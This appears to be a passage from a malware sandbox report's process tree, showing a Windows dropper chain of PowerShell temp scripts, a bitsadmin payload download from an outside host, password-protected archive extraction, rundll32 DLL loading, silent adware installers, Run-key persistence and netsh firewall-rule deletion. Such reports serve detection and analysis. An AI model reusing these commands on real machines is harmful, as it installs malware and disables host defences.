C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:8736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:8964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:9160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:8680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
- Checks for any installed AV software in registry
PID:8876

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
15⤵
- Download via BitsAdmin
PID:3936

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
PID:4500

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
PID:7336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:9080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:2844

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
PID:6168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:7204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:4816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:6980

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
15⤵
PID:3628

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
16⤵
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:6348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:7784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:7996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:5980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"
15⤵
PID:6664

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
15⤵
PID:2016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\khjyxiaa.j3y\GcleanerWW.exe /mixone & exit
13⤵
PID:7652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent & exit
13⤵
PID:8300

C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe
C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent
14⤵
PID:8748

C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp" /SL5="$1095C,11382886,1080320,C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe" subid=685 /verysilent
15⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5168

C:\Program Files (x86)\LibraVPN\LibraVPN.exe
"C:\Program Files (x86)\LibraVPN\LibraVPN.exe"
16⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6796

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
17⤵
PID:5928

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:5924

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
18⤵
PID:4540

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
19⤵
PID:5320

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND
17⤵
PID:4420

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:2328

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND
18⤵
- Suspicious use of SetThreadContext
PID:6576

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND
19⤵
PID:9160

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND
17⤵
PID:8684

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:9016

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND
18⤵
PID:4764

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND
19⤵
PID:5324

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND
17⤵
PID:9016

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
18⤵
PID:9108

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:4064

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND
18⤵
PID:4356

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND
19⤵
PID:8992

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND
17⤵
PID:4256

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
18⤵
PID:9188

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:7988

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND
18⤵
PID:5448

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND
19⤵
PID:6460

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
17⤵
PID:7452

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:8580

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
18⤵
PID:6672

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND
19⤵
PID:3172

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound
17⤵
PID:8796

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:7540

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound
18⤵
PID:4540

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound
19⤵
PID:8800

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c ipconfig /flushdns
17⤵
PID:8716

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:7876

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ipconfig /flushdns
18⤵
PID:7592

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
19⤵
- Gathers network information
PID:6400

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im wireguard.exe
17⤵
PID:6028

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wireguard.exe
18⤵
- Kills process with taskkill
PID:8772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh wlan show interfaces > openvpn\dat\tmp_check_WiFi.dat
17⤵
PID:8612

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:8524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6796 -s 1692
17⤵
- Program crash
PID:6528

C:\Program Files (x86)\Data Finder\Versium Research\app.exe
"C:\Program Files (x86)\Data Finder\Versium Research\app.exe"
9⤵
PID:2184

C:\Program Files (x86)\Data Finder\Versium Research\app.exe
"C:\Program Files (x86)\Data Finder\Versium Research\app.exe"
10⤵
- Modifies data under HKEY_USERS
PID:6468

C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
9⤵
PID:5420

C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a
10⤵
PID:2100

C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
9⤵
PID:6336

C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp" /SL5="$30566,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
10⤵
PID:632

C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe
"C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe" /S /UID=lab214
11⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6220

C:\Program Files\Common Files\KLOTBEAUID\prolab.exe
"C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT
12⤵
PID:7464

C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp" /SL5="$505A4,575243,216576,C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT
13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7556

C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe
"C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe"
12⤵
- Checks computer location settings
PID:7520

C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe
"C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe"
12⤵
PID:7628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwmf3g4l.ika\GcleanerEU.exe /eufive & exit
13⤵
PID:4308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4undjfq4.0xu\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:8016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=623 & exit
13⤵
PID:9108

C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe
C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=623
14⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp" /SL5="$20452,138429,56832,C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe" /Verysilent /subid=623
15⤵
- Suspicious use of FindShellTrayWindow
PID:7748

C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe" /Verysilent
16⤵
- Drops file in Program Files directory
PID:8052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe & exit
13⤵
PID:4496

C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe
C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe
14⤵
PID:8536

C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe
"C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe" -a
15⤵
PID:8448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe & exit
13⤵
PID:3892

C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
14⤵
- Suspicious use of SetThreadContext
PID:8832

C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe
15⤵
PID:3280

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S & exit
13⤵
PID:8344

C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S
14⤵
- Drops file in Program Files directory
PID:3712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:5572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:3892

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
PID:2328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:7012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:1276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:5160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:4124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
- Checks for any installed AV software in registry
PID:5152

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
15⤵
- Download via BitsAdmin
PID:7856

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
- Drops file in Program Files directory
PID:8824

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
15⤵
PID:6172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:5696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:8940

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:4984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:4948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:8244

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
15⤵
PID:8832

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
16⤵
- Drops file in System32 directory
PID:8820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:7996

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
PID:4124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:8316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:6168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:5520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"
15⤵
PID:6668

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
15⤵
PID:8380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50me53sj.iaw\GcleanerWW.exe /mixone & exit
13⤵
PID:3488

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-2222 & exit
13⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe
C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-2222
14⤵
PID:6908

C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe
"C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe" /8-2222
15⤵
- Modifies data under HKEY_USERS
PID:5728

C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
"C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
9⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp" /SL5="$20590,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
10⤵
PID:6172

C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe
"C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
11⤵
PID:5536

C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe
"C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT
12⤵
PID:7700

C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp" /SL5="$30550,5808768,66560,C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT
13⤵
PID:7792

C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe
"C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe"
12⤵
- Checks computer location settings
PID:7732

C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe
"C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe"
12⤵
PID:7808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfu0eydc.aw3\GcleanerEU.exe /eufive & exit
13⤵
PID:7044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hccycans.1ip\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:8012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=623 & exit
13⤵
PID:9012

C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe
C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=623
14⤵
PID:9188

C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp" /SL5="$20454,138429,56832,C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe" /Verysilent /subid=623
15⤵
- Suspicious use of FindShellTrayWindow
PID:744

C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe" /Verysilent
16⤵
PID:7024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe & exit
13⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe
C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe
14⤵
PID:8512

C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe
"C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe" -a
15⤵
PID:8028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe & exit
13⤵
PID:5084

C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
14⤵
PID:8900

C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe
15⤵
- Checks SCSI registry key(s)
PID:8356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S & exit
13⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S
14⤵
- Drops file in Program Files directory
PID:7112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:2560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:7660

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
PID:6788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:4816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:8536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:1916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:3644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
15⤵
PID:9132

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
15⤵
